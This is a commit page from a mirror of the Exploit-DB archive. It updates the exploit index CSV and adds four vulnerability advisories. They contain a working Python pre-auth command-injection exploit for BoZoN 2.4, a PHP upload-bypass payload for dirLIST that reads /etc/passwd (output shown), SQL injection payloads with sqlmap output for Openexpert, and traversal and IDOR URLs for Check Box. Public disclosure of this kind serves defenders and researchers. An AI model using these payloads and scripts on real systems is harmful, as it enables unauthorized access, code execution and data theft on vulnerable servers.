bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-01-18

Browse source 
4 new exploits

MkPortal 1.1.1 reviews / Gallery modules - SQL Injection
MKPortal 1.1.1 reviews / Gallery modules - SQL Injection

Joomla! Component GigCalendar 1.0 - SQL Injection
Joomla! Component gigCalendar 1.0 - SQL Injection
Joomla! Component RD-Autos 1.5.5 - 'id' SQL Injection
mkportal 1.2.1 - Multiple Vulnerabilities
Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection
Free Bible Search PHP Script - 'readbible.php' SQL Injection
Joomla! Component RD-Autos 1.5.5 - SQL Injection
MKPortal 1.2.1 - Multiple Vulnerabilities
Blue Eye CMS 1.0.0 - 'clanek' Parameter Blind SQL Injection
Free Bible Search PHP Script - SQL Injection

Simple PHP NewsLetter 1.5 - (olang) Local File Inclusion
Simple PHP NewsLetter 1.5 - Local File Inclusion

Joomla! Component Gigcal 1.x - 'id' SQL Injection
Joomla! Component Gigcal 1.x - 'id' Parameter SQL Injection

SCMS 1 - 'index.php p' Local File Inclusion
SCMS 1 - Local File Inclusion

Max.Blog 1.0.6 - (show_post.php) SQL Injection
Max.Blog 1.0.6 - 'show_post.php' SQL Injection
Max.Blog 1.0.6 - (submit_post.php) SQL Injection
Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass
Max.Blog 1.0.6 - 'submit_post.php' SQL Injection
Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass

Joomla! Component com_simplefaq - 'catid' Blind SQL Injection
Joomla! Component com_simplefaq - 'catid' Parameter Blind SQL Injection

dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities
dirLIST 0.3.0 - Local File Inclusion
dirLIST 0.3.0 - Arbitrary File Upload
BoZoN 2.4 - Remote Code Execution
Check Box 2016 Q2 Survey - Multiple Vulnerabilities
Openexpert 0.5.17 - SQL Injection
This commit is contained in:
Offensive Security 2017-01-18 05:01:17 +00:00
parent 7c1c496c25
commit 19000e5589
6 changed files with 399 additions and 14 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

32
files.csv
View file

@ -17831,7 +17831,7 @@ id,file,description,date,author,platform,type,port
4171,platforms/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion",2007-07-10,"H4 / XPK",php,webapps,0
4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps,0
4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - (show.php newspath) Local File Inclusion",2007-07-12,irk4z,php,webapps,0
4179,platforms/php/webapps/4179.php,"MkPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0
4179,platforms/php/webapps/4179.php,"MKPortal 1.1.1 reviews / Gallery modules - SQL Injection",2007-07-12,Coloss,php,webapps,0
4180,platforms/php/webapps/4180.txt,"MKPortal NoBoard Module (Beta) - Remote File Inclusion",2007-07-14,g00ns,php,webapps,0
4182,platforms/php/webapps/4182.txt,"CMScout 1.23 - 'index.php' SQL Injection",2007-07-14,g00ns,php,webapps,0
4183,platforms/php/webapps/4183.txt,"eSyndiCat Directory Software - Multiple SQL Injections",2007-07-14,d3v1l,php,webapps,0
@ -20480,7 +20480,7 @@ id,file,description,date,author,platform,type,port
7741,platforms/asp/webapps/7741.txt,"dMx READY (25 - Products) - Remote Database Disclosure",2009-01-12,Cyber-Zone,asp,webapps,0
7743,platforms/php/webapps/7743.txt,"Realtor 747 - 'define.php INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,php,webapps,0
7744,platforms/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,asp,webapps,0
7746,platforms/php/webapps/7746.txt,"Joomla! Component GigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
7746,platforms/php/webapps/7746.txt,"Joomla! Component gigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,php,webapps,0
7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0
7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - 'cilla.cgi' Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0
7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
@ -20511,10 +20511,10 @@ id,file,description,date,author,platform,type,port
7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Arbitrary File Upload",2009-01-15,ajann,asp,webapps,0
7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 - (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0
7793,platforms/php/webapps/7793.php,"Joomla! Component com_Eventing 1.6.x - Blind SQL Injection",2009-01-15,InjEctOr5,php,webapps,0
7795,platforms/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - 'id' SQL Injection",2009-01-15,H!tm@N,php,webapps,0
7796,platforms/php/webapps/7796.txt,"mkportal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0
7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - (clanek) Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0
7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - 'readbible.php' SQL Injection",2009-01-15,nuclear,php,webapps,0
7795,platforms/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - SQL Injection",2009-01-15,H!tm@N,php,webapps,0
7796,platforms/php/webapps/7796.txt,"MKPortal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,php,webapps,0
7797,platforms/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Parameter Blind SQL Injection",2009-01-15,darkjoker,php,webapps,0
7798,platforms/php/webapps/7798.txt,"Free Bible Search PHP Script - SQL Injection",2009-01-15,nuclear,php,webapps,0
7800,platforms/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
7801,platforms/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
7802,platforms/asp/webapps/7802.txt,"The Walking Club - Authentication Bypass",2009-01-16,ByALBAYX,asp,webapps,0
@ -20525,12 +20525,12 @@ id,file,description,date,author,platform,type,port
7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
7811,platforms/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
7813,platforms/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - (olang) Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0
7813,platforms/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - Local File Inclusion",2009-01-16,ahmadbady,php,webapps,0
7814,platforms/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,php,webapps,0
7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,php,webapps,0
7815,platforms/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' Parameter SQL Injection",2009-01-18,Lanti-Net,php,webapps,0
7816,platforms/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,asp,webapps,0
7817,platforms/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,php,webapps,0
7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p' Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0
7818,platforms/php/webapps/7818.txt,"SCMS 1 - Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0
7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0
7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0
7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,php,webapps,0
@ -20573,7 +20573,7 @@ id,file,description,date,author,platform,type,port
7881,platforms/php/webapps/7881.txt,"Joomla! Component com_flashmagazinedeluxe - (mag_id) SQL Injection",2009-01-26,TurkGuvenligi,php,webapps,0
7883,platforms/php/webapps/7883.txt,"OpenX 2.6.3 - (MAX_type) Local File Inclusion",2009-01-26,"Charlie Briggs",php,webapps,0
7884,platforms/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,php,webapps,0
7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0
7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - 'show_post.php' SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0
7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion",2009-01-27,DSecRG,php,webapps,0
7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0
7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps,0
@ -20581,8 +20581,8 @@ id,file,description,date,author,platform,type,port
7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0
7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps,0
7897,platforms/php/webapps/7897.php,"phpList 2.10.x - (Remote Code Execution by environ Inclusion) Local File Inclusion",2009-01-28,mozi,php,webapps,0
7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - (submit_post.php) SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0
7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - (offline_auth.php) Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0
7898,platforms/php/webapps/7898.txt,"Max.Blog 1.0.6 - 'submit_post.php' SQL Injection",2009-01-28,"Salvatore Fresta",php,webapps,0
7899,platforms/php/webapps/7899.txt,"Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",php,webapps,0
7900,platforms/php/webapps/7900.txt,"Social Engine - (category_id) SQL Injection",2009-01-28,snakespc,php,webapps,0
7901,platforms/php/webapps/7901.py,"SmartSiteCMS 1.0 - (articles.php var) Blind SQL Injection",2009-01-28,certaindeath,php,webapps,0
7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0
@ -22361,7 +22361,7 @@ id,file,description,date,author,platform,type,port
11289,platforms/php/webapps/11289.txt,"Joomla! Component com_dms 2.5.1 - SQL Injection",2010-01-30,kaMtiEz,php,webapps,0
11290,platforms/php/webapps/11290.txt,"phpunity.newsmanager - Local File Inclusion",2010-01-30,kaMtiEz,php,webapps,0
11292,platforms/php/webapps/11292.txt,"Joomla! Component JE Event Calendar - SQL Injection",2010-01-30,B-HUNT3|2,php,webapps,0
11294,platforms/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0
11294,platforms/php/webapps/11294.txt,"Joomla! Component com_simplefaq - 'catid' Parameter Blind SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0
11295,platforms/asp/webapps/11295.txt,"eWebeditor ASP Version - Multiple Vulnerabilities",2010-01-29,anonymous,asp,webapps,0
11296,platforms/php/webapps/11296.txt,"ThinkAdmin - 'page.php' SQL Injection",2010-01-30,AtT4CKxT3rR0r1ST,php,webapps,0
11297,platforms/php/webapps/11297.txt,"IPB (nv2) Awards < 1.1.0 - SQL Injection (PoC)",2010-01-30,fred777,php,webapps,0
@ -35544,7 +35544,7 @@ id,file,description,date,author,platform,type,port
37614,platforms/php/webapps/37614.txt,"PBBoard - 'index.php' Multiple Parameter SQL Injection",2012-08-08,"High-Tech Bridge",php,webapps,0
37615,platforms/php/webapps/37615.txt,"PBBoard - member_id Parameter Validation Password Manipulation",2012-08-08,"High-Tech Bridge",php,webapps,0
37616,platforms/php/webapps/37616.txt,"PBBoard - admin.php xml_name Parameter Arbitrary PHP Code Execution",2012-08-08,"High-Tech Bridge",php,webapps,0
37617,platforms/php/webapps/37617.txt,"dirLIST - Multiple Local File Inclusion / Arbitrary File Upload Vulnerabilities",2012-08-08,L0n3ly-H34rT,php,webapps,0
37617,platforms/php/webapps/37617.txt,"dirLIST 0.3.0 - Local File Inclusion",2012-08-08,L0n3ly-H34rT,php,webapps,0
37620,platforms/php/webapps/37620.txt,"Joomla! Component 'com_docman' - Multiple Vulnerabilities",2015-07-15,"Hugo Santiago",php,webapps,80
37623,platforms/hardware/webapps/37623.txt,"15 TOTOLINK Router Models - Multiple Remote Code Execution Vulnerabilities",2015-07-16,"Pierre Kim",hardware,webapps,0
37624,platforms/hardware/webapps/37624.txt,"4 TOTOLINK Router Models - Cross-Site Request Forgery / Cross-Site Scripting",2015-07-16,"Pierre Kim",hardware,webapps,0
@ -37019,3 +37019,7 @@ id,file,description,date,author,platform,type,port
41080,platforms/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",php,webapps,0
41081,platforms/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",php,webapps,0
41082,platforms/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",java,webapps,0
41083,platforms/php/webapps/41083.txt,"dirLIST 0.3.0 - Arbitrary File Upload",2017-01-17,hyp3rlinx,php,webapps,0
41084,platforms/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,php,webapps,0
41086,platforms/aspx/webapps/41086.txt,"Check Box 2016 Q2 Survey - Multiple Vulnerabilities",2017-01-17,"Fady Mohammed Osman",aspx,webapps,0
41087,platforms/php/webapps/41087.txt,"Openexpert 0.5.17 - SQL Injection",2017-01-17,"Nassim Asrir",php,webapps,0

Can't render this file because it is too large.

55
platforms/aspx/webapps/41086.txt Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: Check Box 2016 Q2 Survey Multiple Vulnerabilities
# Exploit Author: Fady Mohamed Osman (@fady_osman)
# Exploit-db : http://www.exploit-db.com/author/?a=2986
# Youtube : https://www.youtube.com/user/cutehack3r
# Date: Jan 17, 2017
# Vendor Homepage: https://www.checkbox.com/
# Software Link: https://www.checkbox.com/free-checkbox-trial/
# Version: Check Box 2016 Q2,Check Box 2016 Q4 - Fixed in Checkbox Survey,
Inc. v6.7
# Tested on: Check Box 2016 Q2 Trial on windows Server 2012.
# Description : Checkbox is a survey application deployed by a number of
highly profiled companies and government entities like Microsoft, AT&T,
Vodafone, Deloitte, MTV, Virgin, U.S. State Department, U.S. Secret
Service, U.S. Necular Regulatory Comission, UNAIDS, State Of California
and more!!
For a full list of their clients please visit:
https://www.checkbox.com/clients/
1- Directory traversal vulnerability : For example to download the
web.config file we can send a request as the following:
http://www.example.com/Checkbox/Upload.ashx?f=..\..\web.config&n=web.config
2- Direct Object Reference :
attachments to surveys can be accessed directly without login as the
following:
https://www.victim.com/Checkbox/ViewContent.aspx?contentId=5001
I created a script that can bruteforce the numbers to find ID's that will
download the attachment and you can easily write one on your own ;).
3- Open redirection in login page for example:
https://www.victim.com/Checkbox/Login.aspx?ReturnUrl=http://www.google.com
If you can't see why an open redirection is a problem in login page please
visit the following page:
https://www.asp.net/mvc/overview/security/preventing-
open-redirection-attacks
Timeline:
December 2016 - Discovered the vulnerability during Pen. Test conducted by
ZINAD IT for one of our clients.
Jan 12,2017 - Reported to vendor.
Jan 15,2017 - Sent a kind reminder to the vendor.
Jan 16,2017 - First Vendor Response said they will only consider directory
traversal as a vulnerability and that a fix will be sent in the next day.
Jan 16,2017 - Replied to explain why DOR and Open Redirect is a problem.
Jan 17,2017 - Patch Release Fixed the Directory Traversal.
Jan 17,2017 - Sent another email to confirm if DOR and open redirect wont
be fixed.
Jan 17,2017 - Open redirection confirmed to be fixed in the same patch
released before for DOR the vendor said they didn't believe that's a
security concern and that they have added a warning to let users know that
their attachments will be available to anyone with access to that survey page !!

165
platforms/php/webapps/41083.txt Executable file
View file

@ -0,0 +1,165 @@
+]###################################################################################################
[+] Credits / Discovery: John Page
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DIRLIST-FILE-UPLOAD-BYPASS-CMD-EXEC.txt
[+] ISR: Apparition
[+]##################################################################################################
Vendor:
===============
sourceforge.net
Product:
===============
dirList v0.3.0
Download:
===========
sourceforge.net/projects/dir-list/
dirLIST displays files and folders in a given HTTP/FTP directory. It has a wonderful interface with choice of Thumbnail or List
view along with gorgeous icons for different file types. Includes a sleek gallery, web based mp3 player, file admin + more.
Vulnerability Type:
======================================
Bypass File Upload / CMD Execution
CVE Reference:
===============
N/A
Security Issue:
===============
When uploading "Banned" file types dirLIST replies with a base64 encoded error message.
e.g.
dXBsb2FkX2Jhbm5lZA==
Decoded it reads, "upload_banned".
Banned files are setup in the "config.php" file.
$banned_file_types = array('.php', '.php3', '.php4', '.php5', '.htaccess', '.htpasswd', '.asp', '.aspx');
When upload a file, the check is made for banned file types.
In "process_upload.php" on Line: 47
if(in_array(strtolower(strrchr($file_name, ".")), $banned_file_types))
{
header("Location: ../index.php?folder=".$_POST['folder']."&err=".base64_encode("upload_banned"));
exit;
}
However, appending a semicolon ";" to end of our PHP file will skirt the security check allowing
us to upload a banned PHP file type, and our PHP file will be executed by server when accessed later.
Apache manual:
“Files can have more than one extension, and the order of the extensions is normally irrelevant. For example, if the file welcome.html.fr
maps onto content type text/html and language French then the file welcome.fr.html will map onto exactly the same information. etc..
Therefore, a file named file.php.1, can be interpreted as a PHP file and be executed on server.
This usually works if the last extension is not specified in the list of mime-types known to the web server.
Developers are usually unaware of the "Apache" feature to process files with some odd unexpected extension like PHP.1, PHP.; and such.
Tested on:
Windows 7
Bitnami wampstack-5.6.29-0.
Apache/2.4.23 (Win64)
Linux
XAMPP 5.6.8-0
Apache/2.4.12 (Unix)
Exploit/POC:
============
1) Create a banned PHP file to upload named.
"TEST.php.;"
2) Upload to server using dirLIST.
3) Done!
<?php
echo passthru('cat /etc/passwd');
?>
Result:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message
bus:/:/sbin/nologin avahi:x:70:70:Avahi
daemon:/:/sbin/nologin
etc...
Network Access:
===============
Remote
Impact:
=================
System Takeover
Severity:
===========
High
Disclosure Timeline:
=====================
Vendor Notification: No Replies
January 17, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) HYP3RLINX

111
platforms/php/webapps/41084.txt Executable file
View file

@ -0,0 +1,111 @@
[+]##################################################################################################
[+] Credits / Discovery: John Page
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BOZON-PRE-AUTH-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
[+]##################################################################################################
Vendor:
============
bozon.pw/en/
Product:
===========
BoZoN 2.4
Bozon is a simple file-sharing app. Easy to install, free and open source Just copy BoZoN's files onto your server.
Vulnerability Type:
==========================
Pre-Auth Command Execution
CVE Reference:
==============
N/A
Security Issue:
================
A Bozon vulnerability allows unauthenticated attackers to add arbitrary users and inject system commands to the "auto_restrict_users.php"
file of the Bozon web interface.
This issue results in arbitrary code execution on the affected host, attackers system commands will get written and stored to the PHP file
"auto_restrict_users.php" under the private/ directory of the Bozon application, making them persist. Remote attackers will get the command
responses from functions like phpinfo() as soon as the HTTP request has completed.
In addition when an admin or user logs in or the webpage gets reloaded the attackers commands are then executed as they are stored.
If a Command is not injected to the "auto_restrict_users.php" file, unauthenticated attackers can opt to add user accounts at will.
Exploit/POC:
=============
import urllib,urllib2,time
#Bozon v2.4 (bozon.pw/en/) Pre-Auth Remote Exploit
#Discovery / credits: John Page - Hyp3rlinx/Apparition
#hyp3rlinx.altervista.org
#Exploit: add user account | run phpinfo() command
#=========================================================
EXPLOIT=0
IP=raw_input("[Bozon IP]>")
EXPLOIT=int(raw_input("[Exploit Selection]> [1] Add User 'Apparition', [2] Execute phpinfo()"))
if EXPLOIT==1:
CMD="Apparition"
else:
CMD='"];$PWN=''phpinfo();//''//"'
if EXPLOIT != 0:
url = 'http://'+IP+'/BoZoN-master/index.php'
data = urllib.urlencode({'creation' : '1', 'login' : CMD, 'pass' : 'abc123', 'confirm' : 'abc123', 'token' : ''})
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
if EXPLOIT==1:
print 'Apparition user account created! password: abc123'
else:
print "Done!... waiting for phpinfo"
time.sleep(0.5)
print response.read()
Impact:
===============
System Takeover
Severity:
=========
High
Disclosure Timeline:
====================================
Vendor Notification: No Replies
January 17, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) HYP3RLINX

48
platforms/php/webapps/41087.txt Executable file
View file

@ -0,0 +1,48 @@
# Title : Openexpert 0.5.17 - Sql Injection
# Author: Nassim Asrir
# Author Company: Henceforth
# Tested on: Winxp sp3 - win7
# Vendor: https://sourceforge.net/projects/law-expert/
# Download Software: https://sourceforge.net/projects/law-expert/files/
#################################################
## About The Product : ##
OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.
## Vulnerability : ##
- Vulnerable Parametre : area_id
- HTTP Method : GET
- To exploit it : http://HOST/expert_wizard.php?area_id=1'
- Sqlmap Output :
Parameter: area_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: area_id=1 AND 4961=4961
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: area_id=1 AND (SELECT 8855 FROM(SELECT COUNT(*),CONCAT(0x7171706a71,(SELECT (ELT(8855=8855,1))),0x71626b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: area_id=1 AND SLEEP(5)
---
[15:35:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.6.26
back-end DBMS: MySQL >= 5.0
[15:35:38] [INFO] fetching database names
[15:35:39] [INFO] the SQL query used returns 5 entries
[15:35:39] [INFO] retrieved: information_schema
[15:35:39] [INFO] retrieved: mysql
[15:35:39] [INFO] retrieved: performance_schema
[15:35:39] [INFO] retrieved: sys
[15:35:39] [INFO] retrieved: test

2
platforms/windows/local/19143.c
View file

@ -1,8 +1,10 @@
/*
source: http://www.securityfocus.com/bid/180/info
Beginning April 1, 2001 and continuing through April 8, 2001, Windows applications will be offset by one hour - even though the system clock will show the proper time. This is due to the MSVCRT.DLL not correctly interpreting Daylight Savings time during any year in which April 1st falls on a Sunday. In these instances, the DLL is fooled into thinking that DST begins one week later on April 8th.
MSVCRT.DLL shipping with MS VC++ versions 4.1, 4.2, 5.0 and 6.0 are thought to be vulnerable.
*/
//
// APRIL1.C -- Simple test program for the "April's Fools 2001" bug